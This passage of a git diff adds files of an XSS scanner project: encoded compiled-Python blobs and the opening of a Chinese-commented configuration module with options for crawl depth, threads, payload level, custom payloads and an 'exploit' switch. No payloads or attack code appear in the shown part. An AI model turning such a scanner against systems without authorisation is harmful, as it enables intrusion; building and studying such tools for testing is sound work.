zJmxs^7@~b9z{rvt&_kyIPZ|I%(G|esm4!3EMxA>?DcLN+J0a|MK*r1sPP1hPwGbJ=
zQAXZ)Zz4YUGscf=GzoVPmoi~=L-Fa?Zcd$F7<%=_rN4(*Y=t+Ik1MOmgaR(Sa&7*~
z8?sy=D=>BQFPmOHedEet{LN?KG3au!aXMc3#W?1NDc$^)EA#K4zjgY1@G@%ty%(9s
zU9xFy88iuL<<8+*r8h1R^lG$Lp#``cu1Pxk;b^{>#yo<4-;W2_bUk{sC!Mqx?jgjq
z9(W6c&w$`+La+a%8y-^K3lVH)R_n#T9CAn>M&autKU_D&ms5<goKb^iij6A<nwdxq
zVn8}ROoDwD^D>NikYr%_uuqzh2jenw2^mku314r(gO8;Wk{$B}yl~wS3xzimV%ZYT
zm}7>$8e{lz!eq2^qQzdCT+!zevg2pC#qzk_;1WtZ?g`HVrh(^5Sp-}}G{T*~;y1TW
zbc}aQbd7gSH$@sdLX91f^3G6sCvNu`oi+3L#vW?52V1CM-u_urH>j>7nU$f;${<{K
z!*@l4c$Qsg8*ZJ<!FzXGL-kvOb=y8@3R*e`)1oCcV`-DVU{PyOmmh^#U6ZSW)^&qs
z(2K((qxB=}@w(-tI#RVURJC!YIh?;EsLPu(rk-7YX8qaLGp#`@cc<@?^0M|F?d8;W
zQiH8sk@~%%`n_}Ts3~_OceG%nAh>ef2i~xydvNDmuI0kXb0_iSB3RxOY(EgrJvi7o
zXDt}59H|_w9;psiuK(b>Ve5gxUDr*Ph=~lD$T2J2#k_9LjF?M8=901d!seCH^ukDb
zc__Vn?BHyAtr#;OE@VR9i^$OfBL_wgj~s>@l{FV@W~|}D_Mpxx$$53eSQ9eVTq?a>
z`A+5Kns;h~TkMfFRA>z)$@zwl)54YmNjYB^+;J$J`#@68H-20kwjTQSIfs_Yu?`yk
zkX16+E`6+JE`z%p+|#hMi)qsXk*dw%s?BrhITuXlOu^!fGvzZm!NM)G>1}X(bja}g
z^z6^{M0V*Hpd+wicj-FQ6)dcuE|^Z6IsS2ZWar_~&cnfb9}GU|59SZdngT+crs@5c
z5503}=Be=7J;A1~VE*1&)4n^<lU5F?=Q6V|tUtH@LhHHKv2y5U;mpdnwoY|i?3n7h
z*frA>sooN<-ZGbEy|C-tu3+i*4|+eiKS=JL&DsOEN`Jfy^v9N!ptPu{WP0`P@!i3O
zws85rps6IGu)(6nh`A|bZn~OrE%)8rYlZI?20IQ%Ha-~I_#i%f+xha&VCCjd3tB)g
z4flzkI``Dr{gK@2aBlTnamnb(k&}2CHCWviF76yw&*c@38b^%5m3xEx_J90nu>Ahn
zyaRA@^s*6Zr?B;NI2OxfpRui*esbCyY(EsVJTPnOfl+kbYzgWt%uP{S9&@<K%yz7b
zo`f;a+%RX)Kbb4xjDE8e2?#+G?o%-nXf=j06DTen3D?eHr^($=$BBf!w~eb1a}BG@
zmWFQ}aT0_#js}N=o2?u%lf&_yfYZZK%=liD_78a6UKhL<b;Ps|N3ZXw!$CJ9tF34O
z_#x;XwD917Mx`mEqN1MxS1j8B$~WhL`=|piuDg!}23&rJ<08RS0DInmx<VQ)%&31I
zSkDl@S2y2QS7`26-0o8BP-v=d?^EtqXe_rq${MgAQe<jcZm-JJwBBBoq1mSR&#L<r
z8Y{~Z8QJvo^YCHUo?YOARRi9P;__jFN4OsMky_@4JPi{g5!1u0xtn=X${xuw`FRo3
zuSIJO#?ftNYp9h5j7cD(^EZJ7ClLz8XF8=qeMd(q41XYue<0HSjVQUUPmk!WztdZX
WTf%zV>69<jJ5m(Z+XUJS*Z&4iQq1cB

literal 0
HcmV?d00001

diff --git a/xss_scanner/core/__pycache__/logger.cpython-313.pyc b/xss_scanner/core/__pycache__/logger.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..d1696ce0a209d5d844d94baf9c2000ae489f5a9e
GIT binary patch
literal 4096
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

literal 0
HcmV?d00001

diff --git a/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc b/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..f4ed23116862167fc1ba5ee52d0e9a15a1ebe78f
GIT binary patch
literal 14188
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
B$n*dJ

literal 0
HcmV?d00001

diff --git a/xss_scanner/core/config.py b/xss_scanner/core/config.py
new file mode 100644
index 0000000..81f2cdf
--- /dev/null
+++ b/xss_scanner/core/config.py
@@ -0,0 +1,405 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+配置模块，负责管理扫描器的配置参数
+"""
+
+import os
+import json
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+class Config:
+    """配置类，管理扫描器的所有配置选项"""
+    
+    def __init__(self):
+        """初始化默认配置"""
+        # 常规选项
+        self.url = None
+        self.depth = 2
+        self.threads = 5
+        self.timeout = 10
+        self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
+        self.cookies = {}
+        self.headers = {}
+        self.proxy = None
+        self.scan_level = 2
+        self.scan_type = 'all'
+        self.payload_level = 2
+        self.output_file = None
+        self.output_format = 'html'
+        self.verbose = False
+        self.no_color = False
+        
+        # 高级选项
+        self.use_browser = False
+        self.exploit = False
+        self.custom_payloads = None
+        self.exclude_pattern = None
+        self.include_pattern = None
+        self.auth = None
+        
+        # 内部使用
+        self.base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+        self.project_root = os.path.dirname(self.base_dir)
+        
+        # 优先检查项目根目录下的payloads目录，如果不存在再使用模块内部的payloads目录
+        self.payloads_dir = os.path.join(self.project_root, 'payloads')
+        if not os.path.exists(self.payloads_dir) or not os.path.isdir(self.payloads_dir):
+            self.payloads_dir = os.path.join(self.base_dir, 'payloads')
+            logger.debug(f"使用模块内部payloads目录: {self.payloads_dir}")
+        else:
+            logger.debug(f"使用项目根目录payloads目录: {self.payloads_dir}")
+    
+    def load_from_args(self, args):
+        """
+        从命令行参数加载配置
+        
+        Args:
+            args: 解析后的命令行参数
+        """
+        # 常规选项
+        if hasattr(args, 'url') and args.url:
+            self.url = args.url
+            
+        if hasattr(args, 'depth') and args.depth is not None:
+            self.depth = args.depth
+            
+        if hasattr(args, 'threads') and args.threads is not None:
+            self.threads = args.threads
+            
+        if hasattr(args, 'timeout') and args.timeout is not None:
+            self.timeout = args.timeout
+            
+        if hasattr(args, 'user_agent') and args.user_agent:
+            self.user_agent = args.user_agent
+            
